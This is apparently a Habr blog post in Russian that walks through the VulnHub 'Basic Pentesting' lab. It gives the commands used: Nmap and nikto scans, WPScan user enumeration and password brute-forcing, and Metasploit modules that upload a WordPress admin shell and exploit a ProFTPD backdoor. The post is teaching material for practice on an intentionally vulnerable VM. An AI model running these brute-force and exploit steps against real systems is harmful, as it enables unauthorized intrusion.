Хабрахабр

[Из песочницы] VulnHub Basic Pentesting

Всем доброго времени суток.

Многие из Вас знают о Пентесте, кто-то имел даже с ним дело, а кто-то только слышал и хотел бы почувствовать себя мини специалистом в этой области. Давным давно, а может и не давно, на VulnHub появилась лаборатория, посвященная как раз этому.

АКТ I — Настройка

Для работы я использовал Kali Linux и VirtualBox, ну и саму лабораторию of course.
Теперь нам нужно соединить 2 машины. Сделать это просто: открываем cmd и переходим в директорию, где установлен VirtualBox и прописываем настройки для VboxManage

Команды для настройки VBoxManage

cd C:\Program Files\Oracle\VirtualBox
C:\Program Files\Oracle\VirtualBox>VBoxManage.exe dhcpserver add --netname internet --ip 10.0.1.1 --netmask 255.255.255.0 --lowerip 10.0.1.2 --upperip 10.0.1.200 --enable> 

Теперь в настройках Kali и Pentest мы ставим название той сети, которую написали в cmd

АКТ II — In the beginning

Проверяем, видит ли Kali Linux нашу лабораторию.

Видим подключение на eth0. Теперь нам нужно узнать конкретный IP нашей машины. Для этого воспользуемся небезызвестной программой Nmap

IP нашей лаборатории 10.0.1.2

АКТ III — Basic Pentesting

После как Nmap просканировал нашу виртуальную сеть, мы увидели, что на лаборатории открыто 3 порта:

  • 21 — ftp
  • 22 — ssh
  • 80 — http

Пробуем подключиться по 80 порту. Для этого откроем браузер (в моем случае это FireFox)

Отлично! Сайт работает. Давайте проверим, какие директории он от нас скрывает. Для этого воспользуемся замечательной программой nikto и посмотрим на результат.

OSVDB-3092: /secret/: This might be interesting

Директория secret должна быть интересной. Давайте же узнаем, что она скрывает

Выглядит, конечно, на 3 из 10, но это всё можно исправить, во имя красоты и удобства, естественно.

Самые внимательные, наверное, уже догадались, да и nikto с Nmap нам ни раз намекали.

 - Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/> - Nmap scan report for vtcsec (10.0.1.2)

Допишем в hosts название, через terminal:

# echo "10.0.1.2 vtcsec" >> /etc/hosts

Теперь-то мы готовы увидеть всю красоту сайта

Теперь, как ищейки, смотрим все директории сайта, тыкаем на все, что тыкается и в конце узнаем, что сайт написан на WordPress. Да — да nikto нам и до этого говорил это, но легких путей мы не ищем.

Давайте же воспользуемся сканером уязвимостей WordPress — WPScan

# wpscan --url http://10.0.1.2/secret/

вывод WPScan

Хммм, а давайте попробуем перечислить все имена пользователей с помощью флага --enumerate u.

# wpscan --url http://10.0.1.2/secret/ --enumerate u

Есть только один user. Значит, можно попробовать побрутить пароль.

# wpscan --url http://10.0.1.2/secret/ --wordlist /usr/share/wordlists/dirb/big.txt --threads 2

К сожалению, наш брут не увенчался успехом, но мы увидели кое-что интересное — ошибка логина admin и пароля admin.

Надо будет попробовать провести exploit через Metasploit

АКТ IV — Admin is coming

Для начала нужно провести настройку Metasploit.

#/etc/init.d/postgresql start
# msfdb init

Стартуем!

# msfconsole

Нужно найти наш exploit. Воспользуемся командой search

# search admin

Из списка нам подходит wp_admin_shell_upload

Запускаем его и проводим настройку

# msf>use exploit/unix/webapp/wp_admin_shell_upload
# msf>set username admin
# msf>set password admin
# msf>set rhost 10.0.1.2
# msf>set targeturi /secret

Должно получиться так:

Запуск!

Переходим в браузер и заходим под admin/admin

АКТ V — I see backdoor

Теперь попробуем получить доступ до terminal'а. Для этого опять нам понадобится Metasploit.

# msf>use exploit/unix/ftp/proftpd_133c_backdoor

Проводим настройку

# msf>set rhost 10.0.1.2

Запуск! (вместо run можно использовать exploit)

Тадааам, мы получили доступ до консоли.

Теги
Показать больше

Похожие статьи

Кнопка «Наверх»
Закрыть